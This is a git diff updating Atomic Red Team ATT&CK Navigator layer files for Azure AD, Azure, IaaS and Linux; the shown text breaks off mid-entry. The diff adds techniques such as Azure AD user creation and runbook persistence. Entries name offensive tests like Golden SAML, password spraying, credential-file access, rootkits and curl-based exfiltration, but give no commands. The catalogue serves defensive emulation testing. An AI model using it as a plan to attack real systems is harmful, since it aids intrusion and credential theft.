diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
index 018ec904..19125baa 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
@@ -1 +1 @@
-{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
\ No newline at end of file
+{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json
index 50b6f592..cdb8169f 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json
@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":2,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
\ No newline at end of file
+{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":2,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
index 43e9f644..3143fa79 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":4,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- Azure - Eventhub Deletion\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
\ No newline at end of file
+{"name":"Atomic Red Team (Iaas)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":2,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":4,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- Azure - Eventhub Deletion\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
index 921aa09f..0a2938c1 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
@@ -1 +1 @@
-{"name":"Atomic Red Team (Linux)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Linux"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.007","score":3,"enabled":true,"comment":"\n- Dump individual process memory with sh (Local)\n- Dump individual process memory with Python (Local)\n- Capture Passwords with MimiPenguin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":4,"enabled":true,"comment":"\n- Access /etc/shadow (Local)\n- Access /etc/passwd (Local)\n- Access /etc/{shadow,passwd} with a standard bin that's not cat\n- Access /etc/{shadow,passwd} with shell builtins\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1007","score":1,"enabled":true,"comment":"\n- System Service Discovery - systemctl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"comment":"\n- Loadable Kernel Module based Rootkit\n- Loadable Kernel Module based Rootkit\n- dynamic-linker based rootkit (libprocesshider)\n- Loadable Kernel Module based Rootkit (Diamorphine)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":1,"enabled":true,"comment":"\n- System Network Configuration Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":5,"enabled":true,"comment":"\n- Remote System Discovery - arp nix\n- Remote System Discovery - sweep\n- Remote System Discovery - ip neighbour\n- Remote System Discovery - ip route\n- Remote System Discovery - ip tcp_metrics\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Decode base64 Data into Script\n"},{"techniqueID":"T1027.001","score":1,"enabled":true,"comment":"\n- Pad Binary to Change Hash - Linux/macOS dd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":2,"enabled":true,"comment":"\n- Binary simply packed by UPX (linux)\n- Binary packed by UPX, with modified headers (linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":3,"enabled":true,"comment":"\n- C compile\n- CC compile\n- Go compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"comment":"\n- Data Transfer Size Limits\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":1,"enabled":true,"comment":"\n- System Owner/User Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":1,"enabled":true,"comment":"\n- Masquerading as Linux crond process.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Execute a process from a directory masquerading as the current parent directory.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":1,"enabled":true,"comment":"\n- Space After Filename\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.004","score":2,"enabled":true,"comment":"\n- rc.common\n- rc.local\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Linux using tshark or tcpdump\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo\n- Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo\n- Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":2,"enabled":true,"comment":"\n- Port Scan\n- Port Scan Nmap\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- Exfiltration Over Alternative Protocol - SSH\n- Exfiltration Over Alternative Protocol - SSH\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":3,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - DNS\n- Python3 http.server\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":1,"enabled":true,"comment":"\n- System Network Connections Discovery Linux & MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a job\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":3,"enabled":true,"comment":"\n- Cron - Replace crontab with referenced file\n- Cron - Add script to all cron subfolders\n- Cron - Add script to /var/spool/cron/crontabs/ folder\n","links":[{"label":"View 